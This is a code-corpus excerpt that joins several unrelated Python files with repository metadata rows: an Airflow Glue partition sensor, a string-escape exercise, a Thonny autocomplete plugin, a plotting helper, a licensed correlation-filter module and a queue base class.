Waits for a partition to show up in AWS Glue Catalog.
:param table_name: The name of the table to wait for, supports the dot
notation (my_database.my_table)
:type table_name: str
:param expression: The partition clause to wait for. This is passed as
is to the AWS Glue Catalog API's get_partitions function,
and supports SQL like notation as in ``ds='2015-01-01'
AND type='value'`` and comparison operators as in ``"ds>=2015-01-01"``.
See https://docs.aws.amazon.com/glue/latest/dg/aws-glue-api-catalog-partitions.html
#aws-glue-api-catalog-partitions-GetPartitions
:type expression: str
:param aws_conn_id: ID of the Airflow connection where
credentials and extra configuration are stored
:type aws_conn_id: str
:param region_name: Optional aws region name (example: us-east-1). Uses region from connection
if not specified.
:type region_name: str
:param database_name: The name of the catalog database where the partitions reside.
:type database_name: str
:param poke_interval: Time in seconds that the job should wait in
between each tries
:type poke_interval: int
"""
template_fields: Sequence[str] = (
'database_name',
'table_name',
'expression',
)
ui_color = '#C5CAE9'
def __init__(
self,
*,
table_name: str,
expression: str = "ds='{{ ds }}'",
aws_conn_id: str = 'aws_default',
region_name: Optional[str] = None,
database_name: str = 'default',
poke_interval: int = 60 * 3,
**kwargs,
):
super().__init__(poke_interval=poke_interval, **kwargs)
self.aws_conn_id = aws_conn_id
self.region_name = region_name
self.table_name = table_name
self.expression = expression
self.database_name = database_name
self.hook: Optional[GlueCatalogHook] = None
def poke(self, context: 'Context'):
"""Checks for existence of the partition in the AWS Glue Catalog table"""
if '.' in self.table_name:
self.database_name, self.table_name = self.table_name.split('.')
self.log.info(
'Poking for table %s. %s, expression %s', self.database_name, self.table_name, self.expression
)
return self.get_hook().check_for_partition(self.database_name, self.table_name, self.expression)
def get_hook(self) -> GlueCatalogHook:
"""Gets the GlueCatalogHook"""
if self.hook:
return self.hook
self.hook = GlueCatalogHook(aws_conn_id=self.aws_conn_id, region_name=self.region_name)
return self.hook
class AwsGlueCatalogPartitionSensor(GlueCatalogPartitionSensor):
"""
This sensor is deprecated. Please use
:class:`airflow.providers.amazon.aws.sensors.glue_catalog_partition.GlueCatalogPartitionSensor`.
"""
def __init__(self, *args, **kwargs):
warnings.warn(
"This sensor is deprecated. "
"Please use :class:`airflow.providers.amazon.aws.sensors.glue_catalog_partition.GlueCatalogPartitionSensor`.", # noqa: 501
DeprecationWarning,
stacklevel=2,
)
super().__init__(*args, **kwargs)
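# A hedged usage sketch: wiring the sensor into a DAG. The dag_id, schedule and
# the table/partition values below are placeholder choices, not provider defaults.
if __name__ == "__main__":
    from datetime import datetime
    from airflow import DAG
    with DAG(
        dag_id="example_glue_partition_wait",
        start_date=datetime(2021, 1, 1),
        schedule_interval="@daily",
        catchup=False,
    ) as dag:
        wait_for_partition = GlueCatalogPartitionSensor(
            task_id="wait_for_partition",
            table_name="my_database.my_table",
            expression="ds='{{ ds }}'",
            aws_conn_id="aws_default",
            poke_interval=60,
        )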
| 38.429825 | 135 | 0.688884 |
8cab8cad858eaa54991104c33aa0adee1d6a9ee0 | 265 | py | Python | ex10.py | Ma-Min-Min/python-exercises | 1b0d63456d88b4750f89821782812becf4177375 | [
"MIT"
] | null | null | null | ex10.py | Ma-Min-Min/python-exercises | 1b0d63456d88b4750f89821782812becf4177375 | [
"MIT"
] | null | null | null | ex10.py | Ma-Min-Min/python-exercises | 1b0d63456d88b4750f89821782812becf4177375 | [
"MIT"
] | null | null | null | tabby_cat = "\tI'm tabbed in."
persian_cat = "\I'm split \non a line."
backslash_cat = "I'm \\ a \\ cat."
fat_cat = """
I'll do a list:
\t* Cat food
\t* Fishies
\t* Catnip\n\t* Grass
"""
print (tabby_cat)
print (persian_cat)
print (backslash_cat)
print (fat_cat)
| 16.5625 | 39 | 0.649057 |
e2e250ae8f857a236eb45b9a13ccca433ea81fc8 | 11,011 | py | Python | thonny/plugins/autocomplete.py | aroberge/thonny | 919769139c9cbfdfa2b78f6a6f0a3d9ecee56e28 | [
"MIT"
] | null | null | null | thonny/plugins/autocomplete.py | aroberge/thonny | 919769139c9cbfdfa2b78f6a6f0a3d9ecee56e28 | [
"MIT"
] | null | null | null | thonny/plugins/autocomplete.py | aroberge/thonny | 919769139c9cbfdfa2b78f6a6f0a3d9ecee56e28 | [
"MIT"
] | null | null | null | import tkinter as tk
from tkinter import messagebox
from thonny import get_runner, get_workbench
from thonny.codeview import CodeViewText
from thonny.common import InlineCommand
from thonny.shell import ShellText
# TODO: adjust the window position in cases where it's too close to bottom or right edge - but make sure the current line is shown
"""Completions get computed on the backend, therefore getting the completions is
asynchronous.
"""
class Completer(tk.Listbox):
def __init__(self, text):
tk.Listbox.__init__(
self,
master=text,
font="SmallEditorFont",
activestyle="dotbox",
exportselection=False,
)
self.text = text
self.completions = []
self.doc_label = tk.Label(
master=text, text="Aaappiiiii", bg="#ffffe0", justify="left", anchor="nw"
)
# Auto indenter will eat up returns, therefore I need to raise the priority
# of this binding
self.text_priority_bindtag = "completable" + str(self.text.winfo_id())
self.text.bindtags((self.text_priority_bindtag,) + self.text.bindtags())
self.text.bind_class(
self.text_priority_bindtag, "<Key>", self._on_text_keypress, True
)
self.text.bind(
"<<TextChange>>", self._on_text_change, True
) # Assuming TweakableText
# for cases when Listbox gets focus
self.bind("<Escape>", self._close)
self.bind("<Return>", self._insert_current_selection)
self.bind("<Double-Button-1>", self._insert_current_selection)
self._bind_result_event()
def _bind_result_event(self):
# TODO: remove binding when editor gets closed
get_workbench().bind(
"editor_autocomplete_response", self._handle_backend_response, True
)
def handle_autocomplete_request(self):
row, column = self._get_position()
source = self.text.get("1.0", "end-1c")
get_runner().send_command(
InlineCommand(
"editor_autocomplete",
source=source,
row=row,
column=column,
filename=self._get_filename(),
)
)
def _handle_backend_response(self, msg):
row, column = self._get_position()
source = self.text.get("1.0", "end-1c")
if msg.source != source or msg.row != row or msg.column != column:
# situation has changed, information is obsolete
self._close()
elif msg.error:
self._close()
messagebox.showerror(
"Autocomplete error", msg.error, parent=get_workbench()
)
else:
self._present_completions(msg.completions)
def _present_completions(self, completions):
self.completions = completions
# broadcast logging info
row, column = self._get_position()
get_workbench().event_generate(
"AutocompleteProposal",
text_widget=self.text,
row=row,
column=column,
proposal_count=len(completions),
)
# present
if len(completions) == 0:
self._close()
elif len(completions) == 1:
self._insert_completion(completions[0]) # insert the only completion
self._close()
else:
self._show_box(completions)
def _show_box(self, completions):
self.delete(0, self.size())
self.insert(
0,
*[
c["name"] + ("=" if c["complete"].endswith("=") else "")
for c in completions
]
)
self.activate(0)
self.selection_set(0)
# place box
if not self._is_visible():
# _, _, _, list_box_height = self.bbox(0)
height = 100 # min(150, list_box_height * len(completions) * 1.15)
typed_name_length = len(completions[0]["name"]) - len(
completions[0]["complete"]
)
text_box_x, text_box_y, _, text_box_height = self.text.bbox(
"insert-%dc" % typed_name_length
)
# should the box appear below or above cursor?
space_below = self.master.winfo_height() - text_box_y - text_box_height
space_above = text_box_y
if space_below >= height or space_below > space_above:
height = min(height, space_below)
y = text_box_y + text_box_height
else:
height = min(height, space_above)
y = text_box_y - height
width = 400
self.place(x=text_box_x, y=y, width=width, height=height)
self._update_doc()
def _update_doc(self):
c = self._get_selected_completion()
if c is None:
self.doc_label["text"] = ""
self.doc_label.place_forget()
else:
docstring = c.get("docstring", None)
if docstring:
self.doc_label["text"] = docstring
self.doc_label.place(
x=self.winfo_x() + self.winfo_width(),
y=self.winfo_y(),
width=400,
height=self.winfo_height(),
)
else:
self.doc_label["text"] = ""
self.doc_label.place_forget()
def _is_visible(self):
return self.winfo_ismapped()
def _insert_completion(self, completion):
typed_len = len(completion["name"]) - len(completion["complete"].strip("="))
typed_prefix = self.text.get("insert-{}c".format(typed_len), "insert")
get_workbench().event_generate(
"AutocompleteInsertion",
text_widget=self.text,
typed_prefix=typed_prefix,
completed_name=completion["name"],
)
if self._is_visible():
self._close()
if not completion["name"].startswith(typed_prefix):
            # e.g. in case the typed prefix was not correct
self.text.delete("insert-{}c".format(typed_len), "insert")
self.text.insert("insert", completion["name"])
else:
self.text.insert("insert", completion["complete"])
def _get_filename(self):
# TODO: allow completing in shell
if not isinstance(self.text, CodeViewText):
return None
codeview = self.text.master
editor = get_workbench().get_editor_notebook().get_current_editor()
if editor.get_code_view() is codeview:
return editor.get_filename()
else:
return None
def _move_selection(self, delta):
selected = self.curselection()
if len(selected) == 0:
index = 0
else:
index = selected[0]
index += delta
index = max(0, min(self.size() - 1, index))
self.selection_clear(0, self.size() - 1)
self.selection_set(index)
self.activate(index)
self.see(index)
self._update_doc()
def _get_request_id(self):
return "autocomplete_" + str(self.text.winfo_id())
def _get_position(self):
return map(int, self.text.index("insert").split("."))
def _on_text_keypress(self, event=None):
if not self._is_visible():
return None
if event.keysym == "Escape":
self._close()
return "break"
elif event.keysym in ["Up", "KP_Up"]:
self._move_selection(-1)
return "break"
elif event.keysym in ["Down", "KP_Down"]:
self._move_selection(1)
return "break"
elif event.keysym in ["Return", "KP_Enter", "Tab"]:
assert self.size() > 0
self._insert_current_selection()
return "break"
return None
def _insert_current_selection(self, event=None):
self._insert_completion(self._get_selected_completion())
def _get_selected_completion(self):
sel = self.curselection()
if len(sel) != 1:
return None
return self.completions[sel[0]]
def _on_text_change(self, event=None):
if self._is_visible():
self.handle_autocomplete_request()
def _close(self, event=None):
self.place_forget()
self.doc_label.place_forget()
self.text.focus_set()
def on_text_click(self, event=None):
if self._is_visible():
self._close()
class ShellCompleter(Completer):
def _bind_result_event(self):
# TODO: remove binding when editor gets closed
get_workbench().bind(
"shell_autocomplete_response", self._handle_backend_response, True
)
def handle_autocomplete_request(self):
source = self._get_prefix()
get_runner().send_command(InlineCommand("shell_autocomplete", source=source))
def _handle_backend_response(self, msg):
# check if the response is relevant for current state
if msg.source != self._get_prefix():
self._close()
else:
self._present_completions(msg.completions)
def _get_prefix(self):
return self.text.get("input_start", "insert") # TODO: allow multiple line input
def handle_autocomplete_request(event=None):
if event is None:
text = get_workbench().focus_get()
else:
text = event.widget
_handle_autocomplete_request_for_text(text)
def _handle_autocomplete_request_for_text(text):
if not hasattr(text, "autocompleter"):
if isinstance(text, (CodeViewText, ShellText)):
if isinstance(text, CodeViewText):
text.autocompleter = Completer(text)
elif isinstance(text, ShellText):
text.autocompleter = ShellCompleter(text)
text.bind("<1>", text.autocompleter.on_text_click)
else:
return
text.autocompleter.handle_autocomplete_request()
def patched_perform_midline_tab(text, event):
if isinstance(text, ShellText):
option_name = "edit.tab_complete_in_shell"
else:
option_name = "edit.tab_complete_in_editor"
if get_workbench().get_option(option_name):
if not text.has_selection():
_handle_autocomplete_request_for_text(text)
return "break"
else:
return None
return text.perform_smart_tab(event)
def load_plugin() -> None:
get_workbench().add_command(
"autocomplete",
"edit",
_("Auto-complete"),
handle_autocomplete_request,
default_sequence="<Control-space>"
# TODO: tester
)
get_workbench().set_default("edit.tab_complete_in_editor", True)
get_workbench().set_default("edit.tab_complete_in_shell", True)
CodeViewText.perform_midline_tab = patched_perform_midline_tab # type: ignore
ShellText.perform_midline_tab = patched_perform_midline_tab # type: ignore
| 31.731988 | 130 | 0.593407 |
fc13e2f330dbcc1f63bbf4a3976928b70e6368a5 | 4,447 | py | Python | DataVisulization.py | Islanderrobotics/data-visulization | b3e66073b65554a0ffd63918a75c4e13bca591f8 | [
"MIT"
] | null | null | null | DataVisulization.py | Islanderrobotics/data-visulization | b3e66073b65554a0ffd63918a75c4e13bca591f8 | [
"MIT"
] | null | null | null | DataVisulization.py | Islanderrobotics/data-visulization | b3e66073b65554a0ffd63918a75c4e13bca591f8 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import pandas as pd
from PyQt5 import QtWidgets
import math
import sys
class NotAnOpption(Exception):
pass
class NeedsToBeATuple(Exception):
pass
class MissingColumnNames(Exception):
pass
class DataVisulization:
def __init__(self, data = None,type_of_plot = "", column_values_for_x = None, column_values_for_y = None,alpha = None):
self.data = data
self.alpha = alpha
self.x = column_values_for_x
self.y = column_values_for_y
self.type_of_plot = type_of_plot
plt.rcParams["figure.figsize"]= self.FindingScreenSize_()
if type_of_plot.upper() == "HIST":
self.Hist()
elif(self.x is not None and self.y is not None):
if type_of_plot.upper() == "LINE":
self.Line()
elif type_of_plot.upper() == "SCATTER":
self.Scatter()
elif(self.x is None or self.y is None):
raise MissingColumnNames(column_values_for_x and column_values_for_y)
else:
raise NotAnOpption
def FindingScreenSize_(self):
app = QtWidgets.QApplication(sys.argv)
screen = app.primaryScreen()
size = screen.size()
Screensize = (size.width()/96, size.height()/96)
return Screensize
def ByeByeText(self,df,varlist):
copy = df.copy()
count= 0
if (isinstance(varlist,str)):
if(copy[varlist].dtype == "object"):
print("that will cause an error")
else:
for i in varlist:
if (copy[i].dtype == "object"):
varlist.pop(count)
copy.drop(columns= i, inplace=True)
count+=1
return (copy)
def Hist(self):
final_size = self.FindingScreenSize_()
self.data.hist(figsize= final_size)
plt.show()
def Line(self):
if (isinstance(self.y, list)):
self.DfLine()
else:
plt.plot(self.x,self.y)
def DfLine(self):
count = 1
if (isinstance(self.y,list)):
copy = self.ByeByeText(self.data,self.y)
for i in self.y:
if (math.sqrt(len(self.y)).is_integer()):
plt.subplot(round(math.sqrt(len(self.y))),round(math.sqrt(len(self.y))),count)
else:
plt.subplot(round(math.sqrt(len(self.y))) + 1, round(math.sqrt(len(self.y))), count)
plt.plot(copy[self.x], copy[i])
count += 1
elif (isinstance(self.x, list)):
copy = self.ByeByeText(self.data, self.x)
for i in self.x:
if math.sqrt(len(self.x)).is_integer():
plt.subplot(round(math.sqrt(len(self.x))), round(math.sqrt(len(self.x))), count)
else:
plt.subplot(round(math.sqrt(len(self.x))) + 1, round(math.sqrt(len(self.x))), count)
plt.plot(copy[i], copy[self.y])
count += 1
else:
plt.plot(self.data[self.x], y=self.data[self.y])
plt.show()
def Scatter(self):
if (isinstance(self.data, pd.DataFrame)):
self.Dfscatter()
else:
plt.scatter(x=self.x, y=self.y, alpha=self.alpha)
def Dfscatter(self):
count = 1
if (isinstance(self.y, list)):
copy = self.ByeByeText(self.data, self.y)
for i in self.y:
if (math.sqrt(len(self.y)).is_integer()):
plt.subplot(round(math.sqrt(len(self.y))), round(math.sqrt(len(self.y))), count)
else:
plt.subplot(round(math.sqrt(len(self.y))) + 1, round(math.sqrt(len(self.y))), count)
plt.scatter(copy[self.x], copy[i], alpha=self.alpha)
count += 1
elif (isinstance(self.x, list)):
copy = self.ByeByeText(self.data, self.x)
for i in self.x:
if (math.sqrt(len(self.x)).is_integer()):
plt.subplot(round(math.sqrt(len(self.x))), round(math.sqrt(len(self.x))), count)
else:
plt.subplot(round(math.sqrt(len(self.x))) + 1, round(math.sqrt(len(self.x))), count)
plt.scatter(copy[i], copy[self.y], alpha=self.alpha)
count += 1
else:
plt.scatter(self.data[self.x], y=self.data[self.y])
plt.show() | 37.686441 | 123 | 0.53969 |
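# A hedged usage sketch of the class above: the DataFrame and its column names
# are placeholders; any numeric columns would work the same way.
if __name__ == "__main__":
    example_df = pd.DataFrame({"height": [1.6, 1.7, 1.8, 1.9],
                               "weight": [55, 64, 72, 81]})
    # Scatter "weight" against "height"; alpha controls point transparency.
    DataVisulization(data=example_df, type_of_plot="scatter",
                     column_values_for_x="height", column_values_for_y="weight",
                     alpha=0.8)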
7e9e8d89aaa35444aee0dc3a001cc53d16e8d4f9 | 16,346 | py | Python | scripts/ocof/filters/common.py | wolfram2012/ros_track_ssd | c98d54eb923e5bae5fde4abbedda2fe5ba716606 | [
"MIT"
] | null | null | null | scripts/ocof/filters/common.py | wolfram2012/ros_track_ssd | c98d54eb923e5bae5fde4abbedda2fe5ba716606 | [
"MIT"
] | null | null | null | scripts/ocof/filters/common.py | wolfram2012/ros_track_ssd | c98d54eb923e5bae5fde4abbedda2fe5ba716606 | [
"MIT"
] | null | null | null | # Copyright 2010, David S. Bolme, Colorado State University Research
# Foundation
#
# Colorado State University Software Evaluation License Agreement
#
# This license agreement ("License"), effective today, is made by and between
# you (hereinafter referred to as the "Licensee") and the Board of Governors of
# the Colorado State University System acting by and through Colorado State
# University, an institution of higher education of the State of Colorado,
# located at Fort Collins, Colorado, 80523-2002 ("CSU"), and concerns certain
# software described as "Correlation Filters for Detection, Recognition, and
# Registration," a system of software programs for advanced video signal
# processing and analysis.
#
# 1. General. A non-exclusive, nontransferable, perpetual license is granted
# to the Licensee to install and use the Software for academic, non-profit,
# or government-sponsored research purposes. Use of the Software under this
# License is restricted to non-commercial purposes. Commercial use of the
# Software requires a separately executed written license agreement.
#
# 2. Permitted Use and Restrictions. Licensee agrees that it will use the
# Software, and any modifications, improvements, or derivatives to the
# Software that the Licensee may create (collectively, "Improvements")
# solely for internal, non-commercial purposes and shall not distribute,
# transfer, deploy, or externally expose the Software or Improvements to any
# person or third parties without prior written permission from CSU. The
# term "non-commercial," as used in this License, means academic or other
# scholarly research which (a) is not undertaken for profit, or (b) is not
# intended to produce works, services, or data for commercial use, or (c) is
# neither conducted, nor funded, by a person or an entity engaged in the
# commercial use, application or exploitation of works similar to the
# Software.
#
# 3. Ownership and Assignment of Copyright. The Licensee acknowledges that
# CSU has the right to offer this copyright in the Software and associated
# documentation only to the extent described herein, and the offered
# Software and associated documentation are the property of CSU. The
# Licensee agrees that any Improvements made by Licensee shall be subject
# to the same terms and conditions as the Software. Licensee agrees not to
# assert a claim of infringement in Licensee copyrights in Improvements in
# the event CSU prepares substantially similar modifications or derivative
# works. The Licensee agrees to use his/her reasonable best efforts to
# protect the contents of the Software and to prevent unauthorized
# disclosure by its agents, officers, employees, and consultants. If the
# Licensee receives a request to furnish all or any portion of the Software
# to a third party, Licensee will not fulfill such a request but will refer
# the third party to the CSU Computer Science website
# http://www.cs.colostate.edu/~vision/ocof.html so that the third party's
# use of this Software will be subject to the terms and conditions of this
# License. Notwithstanding the above, Licensee may disclose any
# Improvements that do not involve disclosure of the Software.
#
# 4. Copies. The Licensee may make a reasonable number of copies of the
# Software for the purposes of backup, maintenance of the Software or the
# development of derivative works based on the Software. These additional
# copies shall carry the copyright notice and shall be controlled by this
# License, and will be destroyed along with the original by the Licensee
# upon termination of the License.
#
# 5. Acknowledgement. Licensee agrees that any publication of results obtained
# with the Software will acknowledge its use by an appropriate citation as
# specified in the documentation.
#
# 6. Acknowledgment. CSU acknowledges that the Software executes patent pending
# Algorithms for the purpose of non-commercial uses. Licensee acknowledges
# that this Agreement does not constitute a commercial license to the
# Algorithms. Licensee may apply for a commercial license to the Algorithms
# from Colorado State University Research Foundation by visiting
# http://www.csuventures.org.
#
# 7. Disclaimer of Warranties and Limitation of Liability. THE SOFTWARE IS
# PROVIDED "AS IS," WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. CSU MAKES NO
# REPRESENTATION OR WARRANTY THAT THE SOFTWARE WILL NOT INFRINGE ANY PATENT
# OR OTHER PROPRIETARY RIGHT. IN NO EVENT SHALL CSU BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
# 8. Termination. This License is effective until terminated by either party.
# Your rights under this License will terminate automatically without notice
# from CSU if you fail to comply with any term(s) of this License. Upon
# termination of this License, you shall immediately discontinue all use of
# the Software and destroy the original and all copies, full or partial, of
# the Software, including any modifications or derivative works, and
# associated documentation.
#
# 9. Governing Law and General Provisions. This License shall be governed by
# the laws of the State of Colorado, excluding the application of its
# conflicts of law rules. This License shall not be governed by the United
# Nations Convention on Contracts for the International Sale of Goods, the
# application of which is expressly excluded. If any provisions of this
# License are held invalid or unenforceable for any reason, the remaining
# provisions shall remain in full force and effect. This License is binding
# upon any heirs and assigns of the Licensee. The License granted to
# Licensee hereunder may not be assigned or transferred to any other person
# or entity without the express consent of the Regents. This License
# constitutes the entire agreement between the parties with respect to the
# use of the Software licensed hereunder and supersedes all other previous
# or contemporaneous agreements or understandings between the parties,
# whether verbal or written, concerning the subject matter.
'''
Common base class and utilities shared by the correlation filters in this package.
Created on Apr 18, 2010
@author: bolme
'''
import numpy as np
import pyvision as pv
import scipy as sp
import scipy.ndimage
class CorrelationFilter:
''' This class implements many methods and interfaces that are common to all filters. '''
def __init__(self, size, norm_log=False, norm_meanunit=True, norm_window = pv.cosineWindow, bbox=None, ilog=None):
        '''Initialize some of the basic elements of the correlation filter.'''
# Set the size of this filter
self.size = size
# Setup Normalization Steps
self.norm_log = norm_log
self.norm_meanunit = norm_meanunit
self.norm_window = norm_window
# Only search for peaks in this bounding box
self.bbox = bbox
# A member variable for the filter stored in the fourier domain
self.filter = None
# Caches used for resized versions of the filter and windows
self.window_cache = {}
self.filter_cache = {}
# Fast Local Maximum Detector (Created when first needed)
self.maximum_detector = None
def preprocess(self, tile, ilog=None):
''' Implements some standard preprocessing for all filters. '''
# Get the image tile as a numpy matrix.
if isinstance(tile,pv.Image):
mat = tile.asMatrix2D()
else:
# Assume it is already a matrix
mat = tile
# Apply a logarithmic transformation to pixel values.
if self.norm_log:
mat = np.log(mat + 1)
# print "tile is:",mat
# Transform pixel values to have a mean of zero and unit length
if self.norm_meanunit:
mat = pv.meanUnit(mat)
# print "mat is:",mat
# Window the input tile to reduce fourier edge effects.
window = self._resizeWindow(mat.shape)
if window is not None:
mat = mat * window
if ilog != None:
ilog(pv.Image(mat),label="PREPROCESSED")
return mat
def addTraining(self, tile, output, ilog=None):
        ''' Add training data. This method should be overridden by subclasses. Subclasses should compute the filter and assign the Fourier domain filter to the member variable self.filter.'''
raise NotImplementedError()
def train(self,ilog=None):
'''This should be overridden by subclasses. Subclasses should compute the filter and assign the Fourier domain filter to the member variable self.filter'''
raise NotImplementedError()
def correlate(self, tile, F=None, phase_only=False, ilog=None):
''''''
# Correlate with the filter
if F == None:
# Preprocess the image
mat = self.preprocess(tile,ilog=ilog)
F = np.fft.fft2(mat)
G = self._resizeFilter(F.shape) * F
if phase_only:
G = G/np.abs(G)
g = np.fft.ifft2(G)
# Return just the real part
return g.real
def locate(self, tile, corr=None, subpixel_est=True, bbox=None, ilog=None):
''''''
if corr == None:
corr = self.correlate(tile,ilog=ilog)
if bbox == None:
bbox = self.bbox
if bbox:
#print "CorrShape:",corr.shape
idx = corr[bbox[0]:bbox[1],bbox[2]:bbox[3]].argmax()
_,h = corr[bbox[0]:bbox[1],bbox[2]:bbox[3]].shape
x = bbox[0]+idx/h
y = bbox[2]+idx%h
else:
idx = corr.argmax()
_,h = corr.shape
x = idx/h
y = idx%h
if subpixel_est:
dx,dy = subpixel(corr[x-3:x+4,y-3:y+4])
x += dx
y += dy
return pv.Point(x,y)
def detect(self,tile,corr=None,compute_psrs=False,ilog=None):
if corr == None:
corr = self.correlate(tile,ilog=ilog)
# Create the maximum detector the first time it is needed
if self.maximum_detector == None:
self.maximum_detector = pv.LocalMaximumDetector()
# Find local maximums in the filter response
points, values = self.maximum_detector(corr,threshold=0.0)
if compute_psrs:
# Compute psrs
w,h = corr.shape
corrf = corr.flatten()
psrs = []
for x,y in points:
pk = corr[x,y]
# Mask out the sidelobe
mask = np.zeros([w,h],dtype=np.bool)
mask[x-10:x+11,y-10:y+11] = True
mask[x-5:x+6,y-5:y+6] = False
mask = mask.flatten()
sidelobe = corrf[mask]
# compute the psr
mn = sidelobe.mean()
sd = sidelobe.std()
psr = (pk-mn)/sd
if np.isnan(psr):
psrs.append(0)
else:
psrs.append(psr)
points = [pv.Point(x,y) for x,y in points]
if compute_psrs:
return np.array(points), values, np.array(psrs)
return np.array(points), values
def psr(self, tile, corr=None, ilog=None):
'''
Compute the peak to sidelobe ratio. This is a good measure of quality.
'''
if corr == None:
corr = self.correlate(tile,ilog=ilog)
rows,cols = corr.shape
# Find the peak
i = corr.argmax()
x,y = i/cols, i%cols
corr = corr.flatten()
pk = corr[i]
# Mask out the sidelobe
mask = np.ones([rows,cols],dtype=np.bool)
mask[x-5:x+6,y-5:y+6] = False
mask = mask.flatten()
sidelobe = corr[mask]
# compute the psr
mn = sidelobe.mean()
sd = sidelobe.std()
return (pk-mn)/sd
def asImage(self, ilog=None):
''''''
mat = np.fft.ifft2(self.filter.conj())
mat = np.fft.fftshift(mat)
return pv.Image(mat.real)
def asSpectrum(self):
return self.filter*self.filter.conj()
def scale(self,scale,order=3):
'''
Create a scaled copy of the correlation filter.
@param scale: a scale factor.
@param order: the order of spline interpolation.
@returns: A rescaled correlation filter
@rtype: ocof.CorrelationFilter
'''
filter = np.fft.ifft2(self.filter)
filter = sp.ndimage.zoom(filter,scale,order=order)
result = CorrelationFilter(self.size, norm_log=self.norm_log, norm_meanunit=self.norm_meanunit, norm_window = self.norm_window, bbox=self.bbox)
result.filter = np.fft.fft2(filter)
return result
def _resizeFilter(self,size):
'''
Resize the filter
'''
if size == self.filter.shape:
return self.filter
if not self.filter_cache.has_key(size):
filter = np.fft.ifft2(self.filter)
w,h = size
fw,fh = filter.shape
tmp = np.zeros((w,h), np.complex128) #TODO: check this
w = min(w,fw)
h = min(h,fh)
tmp[ :w/2, :h/2] = filter[ :w/2, :h/2]
tmp[ :w/2,-h/2:] = filter[ :w/2,-h/2:]
tmp[-w/2:,-h/2:] = filter[-w/2:,-h/2:]
tmp[-w/2:, :h/2] = filter[-w/2:, :h/2]
self.filter_cache[size] = np.fft.fft2(tmp)
return self.filter_cache[size]
def _resizeWindow(self,size):
if self.norm_window == None:
return None
if not self.window_cache.has_key(size):
window = self.norm_window(size)
self.window_cache[size] = window
return self.window_cache[size]
def subpixel(b):
# TODO: Locations may always be estimated low
w,h = b.shape
x = np.arange(w).reshape((w,1)) * np.ones((1,h)) - w/2
y = np.arange(h).reshape((1,h)) * np.ones((w,1)) - w/2
x = x.flatten()
y = y.flatten()
c = np.ones((w,h)).flatten()
A = np.array([x*x,x,y*y,y,c]).transpose()
b = b.flatten()
try:
coef = np.linalg.lstsq(A,b)
except:
return 0.0,0.0
a,b,c,d,_ = coef[0]
x = -b/a
y = -d/c
if x > 1 or x < -1 or y > 1 or y < -1:
return 0.0,0.0
return x,y
def createPointTarget(x,y,size,sigma=2.0,**kwargs):
'''Create a target with a Gaussian shaped peak of 1.0 at x,y and is 0.0 everywhere else.'''
x = np.arange(size[0])-x
y = np.arange(size[1])-y
scale = 1.0/(sigma*sigma)
target = np.exp(-scale*x*x).reshape(size[0],1)*np.exp(-scale*y*y).reshape(1,size[1])
return target
def createDeltaTarget(x,y,size,**kwargs):
'''Create a target that has a value of 1.0 at x,y and is 0.0 everywhere else.'''
x = int(round(x))
y = int(round(y))
target = np.zeros(size,dtype=np.float64)
target[x,y] = 1.0
return target
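# A short, hedged sketch exercising the target helpers above on synthetic data;
# the peak location is arbitrary and the 7x7 window mirrors the one used in
# CorrelationFilter.locate.
if __name__ == "__main__":
    tgt = createPointTarget(32.3, 30.7, (64, 64), sigma=2.0)
    px, py = np.unravel_index(tgt.argmax(), tgt.shape)    # integer peak location
    dx, dy = subpixel(tgt[px - 3:px + 4, py - 3:py + 4])  # sub-pixel refinement
    print("integer peak:", (px, py), "sub-pixel offset:", (dx, dy))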
| 38.28103 | 193 | 0.617643 |
b4640cd42f81db86c34b5fc2981d8d05cf3de419 | 1,229 | py | Python | src/ds/queue/queue_abc.py | MitraThakker/DataStructuresInPython | 96bd661821e5aa082caf55f027090f8a2c602158 | [
"MIT"
] | 2 | 2019-03-28T07:46:52.000Z | 2019-03-28T07:46:52.000Z | src/ds/queue/queue_abc.py | MitraThakker/DataStructuresInPython | 96bd661821e5aa082caf55f027090f8a2c602158 | [
"MIT"
] | null | null | null | src/ds/queue/queue_abc.py | MitraThakker/DataStructuresInPython | 96bd661821e5aa082caf55f027090f8a2c602158 | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
from src.errors import (
QueueOverflow,
QueueUnderflow
)
class Queue(ABC):
def __init__(self, capacity: int = 16):
self.__q = list()
self.capacity = capacity
@property
def q(self):
return self.__q
@abstractmethod
def enqueue(self, item):
if len(self.q) == self.capacity:
raise QueueOverflow
self.q.append(item)
@abstractmethod
def dequeue(self):
try:
return self.q.pop(0)
except IndexError:
raise QueueUnderflow
@abstractmethod
def peek(self):
try:
return self.q[0]
except IndexError:
raise QueueUnderflow
@abstractmethod
def is_full(self):
return len(self.q) == self.capacity
@abstractmethod
def is_empty(self):
return len(self.q) == 0
@abstractmethod
def __str__(self):
output_str = 'F|'
for i in self.q:
output_str += f' {i} |'
output_str += 'R'
return output_str
@abstractmethod
def __len__(self):
return len(self.q)
@abstractmethod
def __contains__(self, item):
return item in self.q
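# A minimal concrete subclass sketch showing one way the ABC above can be used:
# each override simply defers to the default behaviour provided by Queue via
# super(). The name ListQueue is illustrative only.
class ListQueue(Queue):
    def enqueue(self, item):
        super().enqueue(item)
    def dequeue(self):
        return super().dequeue()
    def peek(self):
        return super().peek()
    def is_full(self):
        return super().is_full()
    def is_empty(self):
        return super().is_empty()
    def __str__(self):
        return super().__str__()
    def __len__(self):
        return super().__len__()
    def __contains__(self, item):
        return super().__contains__(item)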
| 20.147541 | 43 | 0.57201 |
89ea0503d4c57583aafa4e13c30ce7035bb79660 | 73 | py | Python | location/__init__.py | ohahlev/ahlev-django-location | 7d6060ab7b21509f53790f5863b596f2b95c286a | [
